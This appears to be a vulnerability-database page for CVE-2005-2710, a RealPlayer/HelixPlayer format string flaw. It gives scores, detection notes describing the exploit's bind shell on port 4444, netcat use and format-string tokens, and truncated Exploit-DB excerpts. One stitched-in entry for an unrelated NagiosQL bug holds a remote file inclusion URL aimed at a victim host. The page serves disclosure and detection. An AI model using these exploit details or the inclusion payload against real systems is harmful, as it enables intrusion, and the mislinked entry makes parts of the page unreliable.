CVE-2005-2710
published 2005-09-27CVE-2005-2710: Format string vulnerability in Real HelixPlayer and RealPlayer 10 allows remote attackers to execute arbitrary code via the (1) image handle or (2) timeformat…
PriorityP339medium5.1CVSS 2.0
AVNACHAuNCPIPAP
EXPLOIT
EPSS
13.18%
95.9th percentile
Format string vulnerability in Real HelixPlayer and RealPlayer 10 allows remote attackers to execute arbitrary code via the (1) image handle or (2) timeformat attribute in a RealPix (.rp) or RealText (.rt) file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| realnetworks | realplayer | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →The exploit triggers the format string vulnerability via the 'image' handle or 'timeformat' attribute inside a crafted .rp (RealPix) or .rt (RealText) file delivered remotely (e.g., via a web link). Monitor RealPlayer/HelixPlayer processes opening .rp or .rt files from remote/untrusted sources. ↗
- →The exploit spawns a bind shell on TCP port 4444 using embedded shellcode. Detect outbound or inbound connections to/from port 4444 originating from realplay or realplay.bin processes. ↗
- →Shellcode is heap-mapped in the address range 0x0822****–0x082f**** during exploitation. Memory forensics or debugger-based detection can look for executable shellcode in this heap region within the RealPlayer process. ↗
- →The exploit uses a format string payload embedded in the 'timeformat' XML attribute of the .rp file (fprintf with %N$n-style specifiers). Inspect .rp/.rt files for format string tokens (e.g., %n, %x, %hn) inside XML attributes. ↗
- →The exploit uses /bin/nc (netcat) to connect back to the spawned shell. Detect child processes of realplay/realplay.bin spawning /bin/nc or /bin/sh. ↗
- ·The exploit's EBP-overwrite trampoline technique relies on the crafted .rp filename being stored in an environment variable at a predictable stack location. The author notes this is not stable: 'this is not a stable method as the user can freely manipulate their environment'. ↗
- ·The POC was tested specifically on Debian 3.1 with RealPlayer installed at /usr/local/RealPlayer. Different installation paths or distributions may require adjustments to VULN path and stack pop count (STACKPOP=148). ↗
- ·The shellcode heap mapping range (0x0822****–0x082f****) is specific to the tested environment; ASLR or differing heap layouts on other systems will shift this range. ↗
CVSS provenance
nvdv2.05.1MEDIUMAV:N/AC:H/Au:N/C:P/I:P/A:P
vendor_redhat5.1MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
security flaw
vendor_redhat·2005-09-26·CVSS 5.1
CVE-2005-2710 [MEDIUM] security flaw
security flaw
Format string vulnerability in Real HelixPlayer and RealPlayer 10 allows remote attackers to execute arbitrary code via the (1) image handle or (2) timeformat attribute in a RealPix (.rp) or RealText (.rt) file.
GHSA
GHSA-xq2m-jgm3-gpjw: Format string vulnerability in Real HelixPlayer and RealPlayer 10 allows remote attackers to execute arbitrary code via the (1) image handle or (2) ti
ghsa_unreviewed·2022-05-01
CVE-2005-2710 [MEDIUM] GHSA-xq2m-jgm3-gpjw: Format string vulnerability in Real HelixPlayer and RealPlayer 10 allows remote attackers to execute arbitrary code via the (1) image handle or (2) ti
Format string vulnerability in Real HelixPlayer and RealPlayer 10 allows remote attackers to execute arbitrary code via the (1) image handle or (2) timeformat attribute in a RealPix (.rp) or RealText (.rt) file.
No detection rules found.
Exploit-DB
NagiosQL 2005 2.00 - 'prepend_adm.php' Remote File Inclusion
exploitdb·2007-05-14
CVE-2007-2710 NagiosQL 2005 2.00 - 'prepend_adm.php' Remote File Inclusion
NagiosQL 2005 2.00 - 'prepend_adm.php' Remote File Inclusion
---
#NagiosQL Remote file inclusion
#Download script : http://dfn.dl.sourceforge.net/sourceforge/nagiosql/nagiosql-2.00-P00.tar.gz
#Thanks str0ke
#Exploit :
#http://victim.com/[nagiosQL_path]/functions/prepend_adm.php?SETS[path][physical]=shell.txt?
#Discovered by ThE TiGeR
#Miro_Tiger100[at]Hotmail[dot]com
# milw0rm.com [2007-05-14]
Exploit-DB
RealPlayer/Helix Player (Linux) - Remote Format String
exploitdb·2005-09-26
CVE-2005-2710 RealPlayer/Helix Player (Linux) - Remote Format String
RealPlayer/Helix Player (Linux) - Remote Format String
---
/*
$ An open security advisory #13 - RealPlayer and Helix Player Remote Format String Exploit
1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com
2: Bug Released: September 26th 2005
3: Bug Impact Rate: Hi
4: Bug Scope Rate: Remote
$ This advisory and/or proof of concept code must not be used for commercial gain.
UNIX RealPlayer && Helix Player
http://real.com
http://helixcommunity.org
"The Helix Player is the Helix Community's open source media player for consumers. It is being developed
to have a rich and usable graphical interface and support a variety of open media formats like Ogg Vorbis,
Theora etc.
The RealPlayer for Linux is built on top of the Helix Player for Linux and includes support for several
non-open source compone
http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=168078http://marc.info/?l=bugtraq&m=112785544325326&w=2http://marc.info/?l=full-disclosure&m=112775929608219&w=2http://secunia.com/advisories/16954http://secunia.com/advisories/16961http://secunia.com/advisories/16981http://secunia.com/advisories/17116http://secunia.com/advisories/17127http://securityreason.com/securityalert/27http://securityreason.com/securityalert/41http://www.debian.org/security/2005/dsa-826http://www.gentoo.org/security/en/glsa/glsa-200510-07.xmlhttp://www.idefense.com/application/poi/display?id=311&type=vulnerabilitieshttp://www.kb.cert.org/vuls/id/361181http://www.novell.com/linux/security/advisories/2005_59_RealPlayer.htmlhttp://www.open-security.org/advisories/13http://www.redhat.com/support/errata/RHSA-2005-762.htmlhttp://www.redhat.com/support/errata/RHSA-2005-788.htmlhttps://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11015http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=168078http://marc.info/?l=bugtraq&m=112785544325326&w=2http://marc.info/?l=full-disclosure&m=112775929608219&w=2http://secunia.com/advisories/16954http://secunia.com/advisories/16961http://secunia.com/advisories/16981http://secunia.com/advisories/17116http://secunia.com/advisories/17127http://securityreason.com/securityalert/27http://securityreason.com/securityalert/41http://www.debian.org/security/2005/dsa-826http://www.gentoo.org/security/en/glsa/glsa-200510-07.xmlhttp://www.idefense.com/application/poi/display?id=311&type=vulnerabilitieshttp://www.kb.cert.org/vuls/id/361181http://www.novell.com/linux/security/advisories/2005_59_RealPlayer.htmlhttp://www.open-security.org/advisories/13http://www.redhat.com/support/errata/RHSA-2005-762.htmlhttp://www.redhat.com/support/errata/RHSA-2005-788.htmlhttps://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11015
2005-09-27
Published